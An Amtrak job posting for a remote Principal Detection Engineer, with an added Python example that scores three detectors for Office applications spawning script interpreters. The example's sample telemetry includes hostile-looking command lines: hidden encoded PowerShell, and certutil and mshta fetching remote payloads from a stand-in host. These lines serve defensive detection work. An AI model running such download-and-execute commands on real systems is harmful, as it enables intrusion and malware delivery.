Amtrak

Principal Detection Engineer - 90397456 - Remote

Amtrak, Washington, District of Columbia, us, 20022


Overview

Your success is a train ride away! As we move America's workforce toward the future, Amtrak connects businesses and communities across the country. We employ more than 20,000 diverse, energetic professionals in a variety of career fields throughout the United States. The safety of our passengers, our employees, the public and our operating environment is our priority, and the success of our railroad is due to our employees. Are you ready to join our team? Our values of 'Do the Right Thing, Excel Together and Put Customers First' are at the heart of what matters most to us, and our Core Capabilities, 'Building Trust, Accountability, Effective Communication, Customer Focus, and Proactive Safety & Security' are what every employee needs to know and do to be most impactful at Amtrak. By living the Amtrak values, focusing on our capabilities, and actively embracing and fostering diverse ideas, backgrounds, and perspectives, together we will honor our past and make Amtrak a company of the future.

Summary of Duties

The Detection Engineer will play a critical role in transforming the Cyber Fusion Center. If you are someone who enjoys looking through data sets for anomalies, researching malware, reading up on the latest adversary tactics, techniques, and procedures, and trying out new penetration tools and techniques to see what telemetry they generate, this position is for you. Our team's mission is simple: hunt and find threats. Our team's objective is simple: build a threat-informed defense. Our team's goal is simple: excel together.

Essential Functions

Identify relevant data sources to support threat-detection scenarios and use cases. Engineer detectors that are specific enough to be actionable yet abstract enough to keep matching an adversary's tactics, techniques, and procedures (TTPs) when individual tools or indicators change. Automate threat-detection scenarios and use cases to improve Cyber Incident Response workflows. Provide Cyber Fusion enablement for Detection Improvement Requests (DIR). Build threat detection models that identify relevant threats, leveraging the Detection Development Lifecycle, Threat Detection Maturity, and Alerting and Detection Strategy (ADS) frameworks. Assess the effectiveness of threat detection practices and countermeasures across the Enterprise infrastructure and applications. Perform Cyber Fusion technology detection gap assessments and assist with developing the strategic enhancement roadmap. Participate in planning sessions related to Enterprise projects or new technologies to implement process improvement within the functional area.
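The duties above (pick a data source, engineer a detector that is specific yet abstract, and assess its effectiveness) are illustrated here by one added Python example. It is an editorial illustration, not code from Amtrak or its Cyber Fusion Center. The telemetry is constructed and shaped like Windows process-creation fields (Sysmon Event ID 1 is assumed as the data source); the detector record mimics the Alerting and Detection Strategy (ADS) habit of writing down blind spots and known false positives beside the rule. Three detectors for the same behavior (an Office application launching a script interpreter, ATT&CK T1204.002) are scored against labelled events: one keyed on a single command-line artifact, one keyed on the parent process alone, and one balanced on the parent/child relationship.

```python
"""Added example (not Amtrak's code): three detectors for "Office app spawns an
interpreter", scored against constructed process-creation telemetry."""
from dataclasses import dataclass
from typing import Callable, Dict, List

# Constructed sample events shaped like Sysmon Event ID 1 fields. The "label"
# key is the analyst's ground truth, used only to score the detectors.
EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA", "label": "malicious"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c certutil -urlcache -f http://example.invalid/a.dat a.dat",
     "label": "malicious"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",                      # print-driver helper
     "CommandLine": r"C:\Windows\splwow64.exe 12288", "label": "benign"},
    {"ParentImage": r"C:\Windows\explorer.exe",                # admin running own script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc SQBFAFgA", "label": "benign"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/x.hta", "label": "malicious"},
]


@dataclass
class Detector:
    """Minimal ADS-style record: the rule plus what it knowingly misses and fires on."""
    name: str
    attack_id: str
    blind_spots: str
    known_false_positives: str
    match: Callable[[Dict[str, str]], bool]


def basename(path: str) -> str:
    """Case-insensitive file name of a Windows path; the rules key on names, not paths."""
    return path.rsplit("\\", 1)[-1].lower()


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Documented exclusions of (parent, child) pairs, reviewed rather than silently hard-coded.
ALLOWLIST = {("winword.exe", "splwow64.exe"), ("excel.exe", "splwow64.exe")}

TOO_SPECIFIC = Detector(
    name="encoded PowerShell command line", attack_id="T1059.001",
    blind_spots="cmd, mshta, wscript children; unencoded PowerShell; renamed binaries",
    known_false_positives="administrators who run -enc scripts interactively",
    match=lambda e: basename(e["Image"]) == "powershell.exe"
    and " -enc" in e["CommandLine"].lower(),
)
TOO_ABSTRACT = Detector(
    name="Office application spawns any process", attack_id="T1204.002",
    blind_spots="none at the process-creation layer",
    known_false_positives="every legitimate Office helper process",
    match=lambda e: basename(e["ParentImage"]) in OFFICE,
)
BALANCED = Detector(
    name="Office application spawns a script interpreter", attack_id="T1204.002",
    blind_spots="code injected into an existing interpreter; parent PID spoofing",
    known_false_positives="print helper splwow64.exe (allowlisted); add-ins that shell out",
    match=lambda e: basename(e["ParentImage"]) in OFFICE
    and basename(e["Image"]) in INTERPRETERS
    and (basename(e["ParentImage"]), basename(e["Image"])) not in ALLOWLIST,
)


def evaluate(det: Detector, events: List[Dict[str, str]]) -> Dict[str, int]:
    """Score a detector against labelled events: true/false positives and misses."""
    hits = [det.match(e) for e in events]
    return {
        "tp": sum(1 for e, h in zip(events, hits) if h and e["label"] == "malicious"),
        "fp": sum(1 for e, h in zip(events, hits) if h and e["label"] == "benign"),
        "fn": sum(1 for e, h in zip(events, hits) if not h and e["label"] == "malicious"),
    }


if __name__ == "__main__":
    for det in (TOO_SPECIFIC, TOO_ABSTRACT, BALANCED):
        print(f"{det.name} [{det.attack_id}]: {evaluate(det, EVENTS)}")
```

The scoring loop is the "assess effectiveness" step in miniature: the artifact-level rule misses two of three malicious events and fires on the administrator, the parent-only rule catches everything but also fires on the print helper, and the relationship-level rule catches all three with no false positives on this sample. Re-running the same evaluation after emulating a technique with a new tool (and adding the resulting events to the sample) is how a detector's abstraction level gets tested over time.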

Minimum Qualifications

Bachelor's Degree in Computer Science, Information Systems, Software Engineering, Software Development, Applied Data Science and Machine Learning, or a relevant field, and relevant experience in Cybersecurity. Experience with scripting, object-oriented programming, coding, or infrastructure-as-code (IaC). Ability to think critically and from a threat actor's perspective. Ability to communicate complex information clearly through verbal, written, and/or visual means. Ability to evaluate, analyze, and synthesize large quantities of data into high-quality threat detectors. Knowledge of the MITRE ATT&CK Enterprise, Mobile, and ICS matrices or equivalent. Knowledge of MITRE ATT&CK Navigator or equivalent. Knowledge of the MITRE Engage and D3FEND frameworks or equivalent. Skill in using multiple analytic tools, databases, and techniques (e.g., Analyst's Notebook, link charts, matrices, etc.). Skill in analyzing and assessing internal and external partner cyber operations capabilities and tools. Skill in providing an understanding of target or threat systems through identification and link analysis of relationships.

Preferred Qualifications

Cybersecurity certifications, courses, or hands-on experience with Red Team Operations and Adversary Emulation; Penetration Testing, Exploit Writing, and Ethical Hacking; Offensive Security, Security Operations, Web Application Testing, or Cloud Security; Malware Reverse Engineering; Digital Forensics and Incident Response; Cyber Deception (Attack Detection, Disruption, Active Defense); Applied Data Science and Machine Learning for Cybersecurity Professionals. Experience applying threat hunting methodologies that are intelligence- and hypothesis-driven and grounded in sound scientific-method principles. Knowledge of Operational Technology (OT), Industrial Control Systems (ICS), or SCADA systems is preferred but not required.

Preferred 11+ years of relevant experience in Cybersecurity. Preferred 3+ years of relevant experience with scripting, object-oriented programming, coding, or infrastructure-as-code (IaC).

Work Environment

100% Remote. May require occasional travel up to 25% of the time. May require occasional on-call status. May require occasional after hours, weekend, or periodic shift work supporting a 24x7x365 Cyber Fusion Center.

Communications and Interpersonal Skills

Must have excellent oral and written communication skills.

The salary/hourly range is $124,600-$161,352. Pay is based on several factors including education, work experience, certifications, internal equity, etc. Depending on location, a geo-pay differential may be applied. Amtrak may offer incentive and pay programs including a short-term incentive bonus and long-term incentive plan compensation. In addition to salary, Amtrak offers a comprehensive benefits package including health, dental, and vision plans; health savings accounts; wellness programs; flexible spending accounts; 401K with employer match; life insurance; short- and long-term disability; paid time off; back-up care; adoption assistance; surrogacy assistance; reimbursement of education expenses; Public Service Loan Forgiveness eligibility; Railroad Retirement benefits; and rail pass privileges.

Requisition ID: 165097

Work Arrangement: 02-Remote Optional

Relocation Offered: No

Travel Requirements: Up to 25%

You power our progress through your performance.

We want your work at Amtrak to be more than a job. We want your career at Amtrak to be a fulfilling experience with challenging work, rewarding opportunities, respect among colleagues, and attractive compensation. Amtrak maintains a culture that values high performance and recognizes individual employee contributions.

Amtrak is committed to a safe workplace free of drugs and alcohol. All Amtrak positions require a pre-employment background check that includes prior employment verification, a criminal history check and a pre-employment drug screen. Candidates who test positive for marijuana will be disqualified. Amtrak’s pre-employment drug testing program complies with DOT regulations and applicable law.

In accordance with DOT regulations (49 CFR 40.25), Amtrak is required to obtain prior drug and alcohol testing records for applicants performing safety-sensitive duties. Refusal to provide written consent will result in disqualification from safety-sensitive functions.

In accordance with federal law governing security checks for public transportation providers, Amtrak screens applicants for disqualifying criminal offenses.

Note that any education requirement may be satisfied by equivalent education, training and experience.

Amtrak is an equal opportunity employer and all qualified applicants will receive consideration without regard to race/color, religion, sex, national origin/ethnicity, disability, veteran status, marital status, sexual orientation, gender identity, or any other protected characteristic.
